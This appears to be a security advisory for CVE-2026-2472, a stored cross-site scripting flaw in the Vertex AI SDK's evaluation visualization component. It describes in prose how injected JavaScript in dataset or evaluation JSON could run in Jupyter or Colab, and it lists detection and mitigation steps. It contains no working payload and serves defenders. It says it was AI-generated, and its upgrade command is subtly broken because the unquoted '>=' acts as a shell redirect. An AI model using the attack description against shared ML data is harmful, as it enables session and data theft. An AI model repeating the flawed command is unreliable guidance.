CVE-2026-2472 Overview
A Stored Cross-Site Scripting (XSS) vulnerability exists in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform). This vulnerability affects versions from 1.98.0 up to (but not including) 1.131.0 and allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.
Critical Impact
Attackers can execute arbitrary JavaScript code in victim's Jupyter or Colab environments, potentially leading to data theft, session hijacking, or further compromise of machine learning workflows.
Affected Products
- Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions 1.98.0 to 1.130.x
- Jupyter Notebook environments using affected SDK versions
- Google Colab environments with vulnerable SDK installations
Discovery Timeline
- 2026-02-20 - CVE CVE-2026-2472 published to NVD
- 2026-02-23 - Last updated in NVD database
Technical Details for CVE-2026-2472
Vulnerability Analysis
This Stored XSS vulnerability (CWE-79) resides in the evaluation visualization component of Google Cloud's Vertex AI SDK. The _genai/_evals_visualization module fails to properly sanitize user-controlled input when rendering model evaluation results and dataset JSON data within interactive notebook environments.
When users work with Vertex AI's evaluation features in Jupyter notebooks or Google Colab, the SDK renders visualization outputs that include model evaluation metrics and dataset contents. The vulnerability arises because script escape sequences embedded within these data sources are not adequately escaped or sanitized before being rendered in the notebook's HTML output context.
The attack surface is particularly concerning because it targets machine learning practitioners who routinely process untrusted datasets and model outputs. An attacker can craft malicious JSON payloads containing JavaScript that executes when the victim views evaluation results.
Root Cause
The root cause is improper input validation and insufficient output encoding in the _genai/_evals_visualization component. The SDK fails to sanitize script escape sequences present in model evaluation results or dataset JSON data before rendering them in HTML visualization components. This allows attackers to inject executable JavaScript that persists in the visualization output.
Attack Vector
The attack exploits the network-accessible nature of machine learning workflows. An attacker can inject malicious JavaScript payloads into model evaluation results or dataset JSON data that will later be processed by a victim using the vulnerable Vertex AI SDK. When the victim loads and visualizes this data in their Jupyter or Colab environment, the injected script executes within their browser context.
This is particularly dangerous in collaborative ML workflows where datasets and model outputs are shared between team members. The stored nature of this XSS means the malicious payload persists in the data and can affect multiple users who access the same resources.
The vulnerability does not require authentication for the attacker, though it does require user interaction (the victim must view the malicious visualization). Once triggered, the attacker can potentially access sensitive data within the notebook environment, steal authentication tokens, or manipulate ML workflows.
Detection Methods for CVE-2026-2472
Indicators of Compromise
- Unusual JavaScript patterns in model evaluation result files or dataset JSON containing <script> tags or event handlers
- Unexpected network requests originating from Jupyter or Colab notebooks to external domains
- Browser console errors or warnings related to Content Security Policy violations during visualization rendering
- Modified or tampered dataset JSON files with embedded script escape sequences
Detection Strategies
- Implement static analysis scanning for JavaScript injection patterns in model evaluation outputs and datasets before visualization
- Monitor network traffic from notebook environments for suspicious outbound connections to unknown destinations
- Enable browser developer tools logging to detect unexpected script execution during visualization workflows
- Review audit logs for unusual data access patterns or modifications to shared datasets
Monitoring Recommendations
- Deploy endpoint detection and response (EDR) solutions capable of monitoring browser-based JavaScript execution within notebook environments
- Implement Content Security Policy (CSP) headers in Jupyter deployments to restrict unauthorized script execution
- Enable logging of all dataset imports and model evaluation result processing activities
- Configure alerting for anomalous data patterns in ML pipelines, particularly in shared or collaborative environments
How to Mitigate CVE-2026-2472
Immediate Actions Required
- Upgrade google-cloud-aiplatform SDK to version 1.131.0 or later immediately
- Audit all datasets and model evaluation results for potential injection payloads before visualization
- Implement input validation for any externally-sourced evaluation data or datasets
- Consider isolating ML visualization workflows to sandboxed environments until patches are applied
Patch Information
Google has addressed this vulnerability in version 1.131.0 of the google-cloud-aiplatform SDK. Users should upgrade to this version or later to receive the security fix. For detailed patch information, refer to the Google Cloud Security Bulletin.
Workarounds
- Avoid processing untrusted datasets or model evaluation results in Jupyter/Colab environments until upgraded
- Implement strict Content Security Policy headers in Jupyter deployments to prevent inline script execution
- Review and sanitize all JSON data inputs before using visualization features
- Use isolated virtual environments for processing potentially untrusted ML data
# Upgrade to patched version
pip install --upgrade google-cloud-aiplatform>=1.131.0
# Verify installed version
pip show google-cloud-aiplatform | grep Version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


